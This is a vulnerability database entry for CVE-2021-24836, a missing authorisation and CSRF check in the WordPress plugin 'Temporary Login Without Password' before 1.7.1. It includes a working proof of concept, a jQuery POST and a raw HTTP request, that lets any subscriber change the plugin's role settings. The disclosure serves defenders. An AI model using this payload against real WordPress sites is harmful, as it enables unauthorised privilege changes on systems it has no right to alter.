Lucene search
Apple502jWPEX-ID:15EED13F-3195-4F5D-8933-36695C830F4FHistoryNov 15, 2021 - 12:00 a.m.
Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update
2021-11-1500:00:00
apple502j
114
wordpress
security
plugin
exploit
update
settings
EPSS
0.001
Percentile
21.2%
The plugin does not have authorisation and CSRF checks when updating its settings, which could allows any logged-in users, such as subscribers to update them
jQuery.post("https://example.com/wp-admin/index.php", {
"wtlwp-nonce": "foo", // Not validated
tlwp_settings_data: {
default_role: "editor",
default_expiry_time: "month_after_access",
visible_roles: ["editor", "administrator"],
default_redirect_to: "wp_dashboard"
}
})
POST /wp-admin/index.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Connection: close
Cookie: [subscriber+]
wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor&tlwp_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp_settings_data%5Bdefault_redirect_to%5D=wp_dashboardRelated
patchstack
patchstack
cve
cve
CVE-2021-24836
2021-12-13 11:15:08
cnvd
cnvd
wpvulndb
wpvulndb
cvelist
cvelist
nvd
nvd
CVE-2021-24836
2021-12-13 11:15:08
prion
prion
Cross site request forgery (csrf)
2021-12-13 11:15:00